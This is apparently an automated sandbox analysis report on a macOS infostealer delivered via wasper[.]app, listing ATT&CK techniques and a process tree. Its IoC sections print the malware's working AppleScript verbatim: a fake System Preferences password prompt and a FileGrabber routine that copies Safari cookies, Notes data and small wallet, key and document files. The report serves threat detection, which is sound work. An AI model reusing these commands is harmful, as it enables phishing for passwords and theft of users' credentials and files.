hxxp://wasper[.]app

Analysis

max time kernel
240s
max time network
245s
platform
macos-10.15_amd64
resource
macos-20240711.1-en
resource tags

arch:amd64arch:i386image:macos-20240711.1-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
20-07-2024 09:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://wasper.app

Score

7^/10

discovery evasion execution

Malware Config

Signatures

Queries the macOS version information. 1 TTPs 2 IoCs
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
discovery

System Information Discovery
T1082

Processes:

ioc process

sh -c sw_vers
sw_vers
System Checks 1 TTPs 2 IoCs
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.
evasion

System Checks
T1497.001

Processes:

ioc process

sh -c "system_profiler SPHardwareDataType"
system_profiler SPHardwareDataType
File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur.
evasion

File Deletion
T1070.004

ioc	process
sh -c sw_vers
sw_vers

ioc	process
sh -c "system_profiler SPHardwareDataType"
system_profiler SPHardwareDataType

AppleScript 1 TTPs 6 IoCs

AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.

execution

AppleScript

T1059.002

Processes:

ioc	process
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"84935461\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"84935461:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"
osascript -e "set baseFolderPath to (path to home folder as text) & \"84935461\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"84935461:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell"
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"
osascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"

File and Directory Discovery. 1 TTPs 40 IoCs

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.

discovery

File and Directory Discovery

T1083

Processes:

ioc	process
basename "/Applications/Google Chrome.app"
basename "/Library/Application Support/Script Editor/Templates/Droplets/Recursive Image File Processing Droplet.app"
basename "/Library/Image Capture/Devices/Canon IJScanner6.app"
basename "/Library/Scripts/ColorSync/Show Info.app"
basename "/Library/Scripts/ColorSync/Set Info.app"
basename "/Library/Printers/EPSON/Fax/Utility/Fax Receive Monitor.app"
basename "/Applications/Firefox Developer Edition.app"
basename /Applications/OneDrive.app
basename "/Applications/Microsoft OneNote.app"
basename "/Applications/Microsoft Excel.app"
basename /Library/Scripts/ColorSync/Match.app
basename "/Library/Printers/EPSON/Fax/Utility/FAX Utility.app"
basename "/Library/Image Capture/Devices/Canon IJScanner4.app"
basename /Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.7/Resources/Python.app
basename /Library/Printers/EPSON/Fax/Filter/rastertoepfax.app
basename /Library/Printers/EPSON/Fax/FaxIOSupport/epsonfax.app
basename "/Library/Image Capture/Devices/Canon IJScanner2.app"
xargs -I "%" basename "%"
basename "/Library/Application Support/Google/GoogleUpdater/128.0.6537.0/GoogleUpdater.app"
basename /Applications/Safari.app
basename "/usr/local/Cellar/[email protected]/3.9.7_1/IDLE 3.app"
basename /Library/Scripts/ColorSync/Embed.app
basename "/usr/local/Cellar/[email protected]/3.9.7_1/Python Launcher 3.app"
basename "/Library/Image Capture/Support/LegacyDeviceDiscoveryHelpers/AirScanLegacyDiscovery.app"
basename "/Applications/Microsoft Outlook.app"
basename "/Applications/Microsoft Word.app"
basename /Library/Scripts/ColorSync/Proof.app
basename "/Library/Application Support/Script Editor/Templates/Droplets/Droplet with Settable Properties.app"
basename "/Library/Application Support/Script Editor/Templates/Droplets/Recursive File Processing Droplet.app"
basename "/Library/Application Support/Microsoft/MAU2.0/Microsoft AutoUpdate.app"
basename "/Applications/Microsoft PowerPoint.app"
basename "/Library/Image Capture/Devices/EPSON Scanner.app"
basename /Library/Scripts/ColorSync/Rename.app
basename /Library/Printers/EPSON/Fax/Filter/commandFilter.app
basename "/Library/Application Support/Script Editor/Templates/Cocoa-AppleScript Applet.app"
sh -c "mdfind \"kMDItemContentType == 'com.apple.application-bundle' && kMDItemKind != 'System'\" \| grep -v '/System' \| xargs -I % basename \"%\""
basename "/usr/local/Cellar/[email protected]/3.9.7_1/Frameworks/Python.framework/Versions/3.9/Resources/Python.app"
basename /Library/Scripts/ColorSync/Remove.app
basename /Library/Scripts/ColorSync/Extract.app
basename /Library/Printers/EPSON/Fax/AutoSetupTool/EPFaxAutoSetupTool.app

Resource Forking 1 TTPs 16 IoCs

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

evasion

Resource Forking

T1564.009

Processes:

ioc	process
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid 95F5978A-03FE-419E-A44A-42B2D24A14DA
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -k disk3s1
/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs -q /dev/rdisk3s1
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
basename /Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.7/Resources/Python.app
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Helpers/ksinstall" "--install=/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Resources/Keystone.tbz"
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/hdiejectd
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid 95F5978A-03FE-419E-A44A-42B2D24A14DA -post-exec 4
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -k disk3s1
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -p disk3s1 removable readonly
basename "/usr/local/Cellar/[email protected]/3.9.7_1/Frameworks/Python.framework/Versions/3.9/Resources/Python.app"
/usr/bin/tar -Oxjf "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Resources/Keystone.tbz" GoogleSoftwareUpdate.bundle/Contents/Info.plist
"/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/Resources/DiskImages UI Agent.app/Contents/MacOS/DiskImages UI Agent" 95F5978A-03FE-419E-A44A-42B2D24A14DA
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -p disk3s1 removable readonly
/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs -q /dev/rdisk3s1
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper

/bin/sh
sh -c "sudo /bin/zsh -c \"/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://wasper.app\""
1⤵
PID:487

/bin/bash
sh -c "sudo /bin/zsh -c \"/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://wasper.app\""
1⤵
PID:487

/usr/bin/sudo
sudo /bin/zsh -c "/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://wasper.app"
1⤵
PID:487

/bin/zsh
/bin/zsh -c "/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://wasper.app"
2⤵
PID:489

/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" "--simulate-outdated-no-au=Tue, 31 Dec 2099" --new-window http://wasper.app
2⤵
PID:489

/usr/libexec/xpcproxy
xpcproxy com.apple.GameController.gamecontrollerd
1⤵
PID:501

/usr/libexec/gamecontrollerd
/usr/libexec/gamecontrollerd
1⤵
PID:501

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/chrome_crashpad_handler
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/chrome_crashpad_handler" "--monitor-self-annotation=ptype=crashpad-handler" "--database=/var/root/Library/Application Support/Google/Chrome/Crashpad" "--metrics-dir=/var/root/Library/Application Support/Google/Chrome" "--url=https://clients2.google.com/cr/report" "--annotation=channel=" "--annotation=plat=OS X" "--annotation=prod=Chrome_Mac" "--annotation=ver=101.0.4951.54" "--handshake-fd=5"
1⤵
PID:508

/usr/bin/profiles
/usr/bin/profiles status -type enrollment
1⤵
PID:510

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Helpers/ksinstall
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Helpers/ksinstall" "--install=/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Resources/Keystone.tbz"
1⤵
PID:513

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/developer_id_certificate_reauthorize
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/developer_id_certificate_reauthorize" com.google.Chrome
1⤵
PID:514

/usr/bin/tar
/usr/bin/tar -Oxjf "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Resources/Keystone.tbz" GoogleSoftwareUpdate.bundle/Contents/Info.plist
1⤵
PID:518

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (GPU).app/Contents/MacOS/Google Chrome Helper (GPU)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (GPU).app/Contents/MacOS/Google Chrome Helper (GPU)" "--type=gpu-process" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" "--gpu-preferences=UAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJgEAAAAAAAAmAQAAAAAAACIAQAAMAAAAIABAAAAAAAAiAEAAAAAAACQAQAAAAAAAJgBAAAAAAAAoAEAAAAAAACoAQAAAAAAALABAAAAAAAAuAEAAAAAAADAAQAAAAAAAMgBAAAAAAAA0AEAAAAAAADYAQAAAAAAAOABAAAAAAAA6AEAAAAAAADwAQAAAAAAAPgBAAAAAAAAAAIAAAAAAAAIAgAAAAAAABACAAAAAAAAGAIAAAAAAAAgAgAAAAAAACgCAAAAAAAAMAIAAAAAAAA4AgAAAAAAAEACAAAAAAAASAIAAAAAAABQAgAAAAAAAFgCAAAAAAAAYAIAAAAAAABoAgAAAAAAAHACAAAAAAAAeAIAAAAAAACAAgAAAAAAAIgCAAAAAAAAkAIAAAAAAACYAgAAAAAAAKACAAAAAAAAqAIAAAAAAACwAgAAAAAAALgCAAAAAAAAwAIAAAAAAADIAgAAAAAAANACAAAAAAAA2AIAAAAAAADgAgAAAAAAAOgCAAAAAAAA8AIAAAAAAAD4AgAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAHAAAAEAAAAAAAAAAAAAAACAAAABAAAAAAAAAAAAAAAAkAAAAQAAAAAAAAAAAAAAALAAAAEAAAAAAAAAAAAAAADAAAABAAAAAAAAAAAAAAAA4AAAAQAAAAAAAAAAAAAAAPAAAAEAAAAAAAAAABAAAAAAAAABAAAAAAAAAAAQAAAAcAAAAQAAAAAAAAAAEAAAAIAAAAEAAAAAAAAAABAAAACQAAABAAAAAAAAAAAQAAAAsAAAAQAAAAAAAAAAEAAAAMAAAAEAAAAAAAAAABAAAADgAAABAAAAAAAAAAAQAAAA8AAAAQAAAAAAAAAAQAAAAAAAAAEAAAAAAAAAAEAAAABwAAABAAAAAAAAAABAAAAAgAAAAQAAAAAAAAAAQAAAAJAAAAEAAAAAAAAAAEAAAACwAAABAAAAAAAAAABAAAAAwAAAAQAAAAAAAAAAQAAAAOAAAAEAAAAAAAAAAEAAAADwAAABAAAAAAAAAABwAAAAAAAAAQAAAAAAAAAAcAAAAHAAAAEAAAAAAAAAAHAAAACAAAABAAAAAAAAAABwAAAAkAAAAQAAAAAAAAAAcAAAALAAAAEAAAAAAAAAAHAAAADAAAABAAAAAAAAAABwAAAA4AAAAQAAAAAAAAAAcAAAAPAAAAEAAAAAAAAAAIAAAAAAAAABAAAAAAAAAACAAAAAcAAAAQAAAAAAAAAAgAAAAIAAAAEAAAAAAAAAAIAAAACQAAABAAAAAAAAAACAAAAAsAAAAQAAAAAAAAAAgAAAAMAAAAEAAAAAAAAAAIAAAADgAAABAAAAAAAAAACAAAAA8AAAAQAAAAAAAAAAoAAAAAAAAAEAAAAAAAAAAKAAAABwAAABAAAAAAAAAACgAAAAgAAAAQAAAAAAAAAAoAAAAJAAAAEAAAAAAAAAAKAAAACwAAABAAAAAAAAAACgAAAAwAAAAQAAAAAAAAAAoAAAAOAAAAEAAAAAAAAAAKAAAADwAAAAgAAAAAAAAACAAAAAAAAAA=" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=27"
1⤵
PID:522

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=network.mojom.NetworkService" "--lang=en-GB" "--service-sandbox-type=network" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=27"
1⤵
PID:523

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=storage.mojom.StorageService" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=28"
1⤵
PID:524

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Alerts).app/Contents/MacOS/Google Chrome Helper (Alerts)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Alerts).app/Contents/MacOS/Google Chrome Helper (Alerts)" "--type=utility" "--utility-sub-type=mac_notifications.mojom.MacNotificationProvider" "--lang=en-GB" "--service-sandbox-type=none" --message-loop-type-ui "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072"
1⤵
PID:525

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=7" "--launch-time-ticks=288131502" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=62"
1⤵
PID:530

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=6" "--launch-time-ticks=288170490" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=62"
1⤵
PID:531

/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin
/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin --productid com.google.Chrome --print-tickets --store /Library/Google/GoogleSoftwareUpdate/TicketStore/Keystone.ticketstore
1⤵
PID:533

/usr/libexec/xpcproxy
xpcproxy com.apple.SafariLaunchAgent
1⤵
PID:534

/Library/Apple/System/Library/CoreServices/SafariSupport.bundle/Contents/MacOS/SafariLaunchAgent
/Library/Apple/System/Library/CoreServices/SafariSupport.bundle/Contents/MacOS/SafariLaunchAgent
1⤵
PID:534

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=8" "--launch-time-ticks=292730791" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=73"
1⤵
PID:535

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=12" "--launch-time-ticks=292820667" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=66"
1⤵
PID:536

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=10" "--launch-time-ticks=292869478" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=66"
1⤵
PID:537

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=11" "--launch-time-ticks=292874051" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=66"
1⤵
PID:538

/Library/Application Support/Google/GoogleUpdater/Current/GoogleUpdater.app/Contents/Helpers/launcher
"/Library/Application Support/Google/GoogleUpdater/Current/GoogleUpdater.app/Contents/Helpers/launcher"
1⤵
PID:539

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=95"
1⤵
PID:541

/usr/sbin/system_profiler
/usr/sbin/system_profiler SPConfigurationProfileDataType -detailLevel mini -timeout 15 -xml
1⤵
PID:540

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=97"
1⤵
PID:544

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=105"
1⤵
PID:545

/Library/Application Support/Google/GoogleUpdater/128.0.6537.0/GoogleUpdater.app/Contents/MacOS/GoogleUpdater
GoogleUpdater --server "--service=update" --system
1⤵
PID:0

/Library/Application Support/Google/GoogleUpdater/128.0.6537.0/GoogleUpdater.app/Contents/MacOS/GoogleUpdater
"/Library/Application Support/Google/GoogleUpdater/128.0.6537.0/GoogleUpdater.app/Contents/MacOS/GoogleUpdater" --crash-handler --system "--database=/Library/Application Support/Google/GoogleUpdater/128.0.6537.0/Crashpad" "--url=https://clients2.google.com/cr/report" "--annotation=prod=Update4" "--annotation=ver=128.0.6537.0" "--handshake-fd=5"
2⤵
PID:0

/usr/bin/profiles
/usr/bin/profiles status -type enrollment
3⤵
PID:549

/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin
/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin -P com.google.Chrome --delete --user-store
3⤵
PID:550

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=72"
3⤵
PID:551

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=68"
3⤵
PID:552

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=18" "--launch-time-ticks=308349706" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=68"
3⤵
PID:554

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump
3⤵
